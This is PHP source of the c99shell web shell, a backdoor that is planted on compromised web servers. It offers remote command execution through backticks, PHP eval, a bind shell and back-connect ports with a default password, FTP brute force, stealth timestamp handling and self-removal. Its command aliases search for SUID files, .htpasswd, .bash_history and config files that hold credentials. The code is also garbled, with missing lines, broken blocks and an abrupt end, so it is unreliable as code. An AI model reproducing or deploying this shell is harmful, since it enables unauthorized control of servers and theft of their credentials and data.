<?php
//Starting calls
define("starttime",getmicrotime
());
foreach($_REQUEST as $k=>
$v) {if (!
isset($$k)) {$$k =
$v;
}}
$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
elseif (!
empty($set_surl)) {$surl =
$set_surl;
setcookie("c99sh_surl",
$surl);
}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !
$_REQUEST["c99sh_surl"]) {$include =
"&";
foreach (explode("&",
getenv("QUERY_STRING")) as $v) {$v =
explode("=",
$v);
$name =
urldecode($v[0]);
$value =
urldecode($v[1]);
foreach (array("http://",
"https://",
"ssl://",
"ftp://",
"\\\\") as $needle) {if (strpos($value,
$needle) ===
0) {$includestr .=
urlencode($name).
"=".
urlencode($value).
"&";
}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .=
"surl_autofill_include=1&";
}}
{
$surl = "?".$includestr; //Self url
}
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
$host_allow =
array("*");
//array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act =
array("");
//array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
getenv("PHPRC").
" -q %f%" =>
array("php",
"php3",
"php4"),
"perl %f%" =>
array("pl",
"cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight =
array(
array(basename($_SERVER["PHP_SELF"]),
1,
"<font color=\"yellow\">",
"</font>"),
// example
array("config.php",
1) // example
);
$safemode_diskettes =
array("a");
// This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
array("-----------------------------------------------------------",
"ls -la"),
array("find all suid files",
"find / -type f -perm -04000 -ls"),
array("find suid files in current dir",
"find . -type f -perm -04000 -ls"),
array("find all sgid files",
"find / -type f -perm -02000 -ls"),
array("find sgid files in current dir",
"find . -type f -perm -02000 -ls"),
array("find config.inc.php files",
"find / -type f -name config.inc.php"),
array("find config* files",
"find / -type f -name \"config*\""),
array("find config* files in current dir",
"find . -type f -name \"config*\""),
array("find all writable folders and files",
"find / -perm -2 -ls"),
array("find all writable folders and files in current dir",
"find . -perm -2 -ls"),
array("find all service.pwd files",
"find / -type f -name service.pwd"),
array("find service.pwd files in current dir",
"find . -type f -name service.pwd"),
array("find all .htpasswd files",
"find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir",
"find . -type f -name .htpasswd"),
array("find all .bash_history files",
"find / -type f -name .bash_history"),
array("find .bash_history files in current dir",
"find . -type f -name .bash_history"),
array("find all .fetchmailrc files",
"find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir",
"find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system",
"lsattr -va"),
array("show opened ports",
"netstat -an | grep -i listen")
);
}
else
{
array("-----------------------------------------------------------",
"dir"),
array("show opened ports",
"netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
//Quick launch
array("<img src=\"".
$surl.
"act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",
$surl),
array("<img src=\"".
$surl.
"act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.back(1)"),
array("<img src=\"".
$surl.
"act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.go(1)"),
array("<img src=\"".
$surl.
"act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=ls&d=%upd&sort=%sort"),
array("<img src=\"".
$surl.
"act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",
""),
array("<img src=\"".
$surl.
"act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=search&d=%d"),
array("<img src=\"".
$surl.
"act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=fsbuff&d=%d"),
array("<b>Encoder</b>",
$surl.
"act=encoder&d=%d"),
array("<b>Tools</b>",
$surl.
"act=tools&d=%d"),
array("<b>Proc.</b>",
$surl.
"act=processes&d=%d"),
array("<b>FTP brute</b>",
$surl.
"act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",
$surl.
"act=security&d=%d"),
array("<b>SQL</b>",
$surl.
"act=sql&d=%d"),
array("<b>PHP-code</b>",
$surl.
"act=eval&d=%d"),
array("<b>Update</b>",
$surl.
"act=update&d=%d"),
array("<b>Feedback</b>",
$surl.
"act=feedback&d=%d"),
array("<b>Self remove</b>",
$surl.
"act=selfremove"),
array("<b>Logout</b>",
"#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
@$f = $_REQUEST["f"];
//END CONFIGURATION
// \/Next code isn't for editing\/
$s =
"!^(".
implode("|",
$tmp).
")$!i";
{
if (empty($md5_pass)) {$md5_pass =
md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] !=
$login) or
(md5($_SERVER["PHP_AUTH_PW"]) !=
$md5_pass))
{
header("WWW-Authenticate: Basic realm=\"c99shell ".
$shver.
": ".
$login_txt.
"\"");
header("HTTP/1.0 401 Unauthorized");
}
}
if ($act != "img")
{
if ($selfwrite or
$updatenow) {@
ob_clean(); c99sh_getupdate
($selfwrite,
1);
exit;
}
if (!
is_array($sess_data["copy"])) {$sess_data["copy"] =
array();
}
$disablefunc = @
ini_get("disable_functions");
if (!
empty($disablefunc))
{
$disablefunc =
explode(",",
$disablefunc);
}
{
function c99_buff_prepare()
{
foreach($sess_data["copy"] as $k=>
$v) {$sess_data["copy"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
foreach($sess_data["cut"] as $k=>
$v) {$sess_data["cut"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
sort($sess_data["copy"]);
if ($act !=
"copy") {foreach($sess_data["cut"] as $k=>
$v) {if ($sess_data["copy"][$k] ==
$v) {unset($sess_data["copy"][$k]);
}}}
else {foreach($sess_data["copy"] as $k=>
$v) {if ($sess_data["cut"][$k] ==
$v) {unset($sess_data["cut"][$k]);
}}}
}
}
c99_buff_prepare();
{
function c99_sess_put($data)
{
c99_buff_prepare();
$sess_data = $data;
}
}
foreach (array("sort",
"sql_sort") as $v)
{
if (!
empty($_GET[$v])) {$$v =
$_GET[$v];
}
if (!
empty($_POST[$v])) {$$v =
$_POST[$v];
}
}
if ($sort_save)
{
}
{
function str2mini($content,$len)
{
{
return substr($content,
0,
$len).
"...".
substr($content,-
$len);
}
else {return $content;}
}
}
{
function view_size($size)
{
else
{
if ($size >=
1073741824) {$size =
round($size/
1073741824*
100)/
100 .
" GB";
}
elseif ($size >=
1048576) {$size =
round($size/
1048576*
100)/
100 .
" MB";
}
elseif ($size >=
1024) {$size =
round($size/
1024*
100)/
100 .
" KB";
}
else {$size = $size . " B";}
return $size;
}
}
}
{
function fs_copy_dir($d,$t)
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
else {$ret =
mkdir($t.DIRECTORY_SEPARATOR.
$o); fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
{
function fs_copy_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_copy_dir($d,$t);
}
else {return FALSE;}
}
}
{
function fs_move_dir($d,$t)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
$ret = TRUE;
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
else {if (mkdir($t.DIRECTORY_SEPARATOR.
$o) and fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o)) {$ret =
FALSE;
}}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
{
function fs_move_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_move_dir($d,$t);
}
{
else {unlink($t);
return FALSE;
}
}
else {return FALSE;}
}
}
{
function fs_rmdir($d)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
else {fs_rmdir
($d.
$o.DIRECTORY_SEPARATOR
);
rmdir($d.
$o);
}
}
}
}
}
{
function fs_rmobj($o)
{
{
if (substr($o,
-1) != DIRECTORY_SEPARATOR
) {$o .= DIRECTORY_SEPARATOR;
}
return fs_rmdir($o);
}
else {return FALSE;}
}
}
{
function myshellexec($cmd)
{
$result = "";
{
elseif (($result = `$cmd`) !== FALSE) {}
{
$result = "";
while(!
feof($fp)) {$result .=
fread($fp,
1024);
}
}
}
return $result;
}
}
{
function view_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$type = "s";}
elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
else {$type = "?";}
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)? "w":"-";
$world["execute"] = (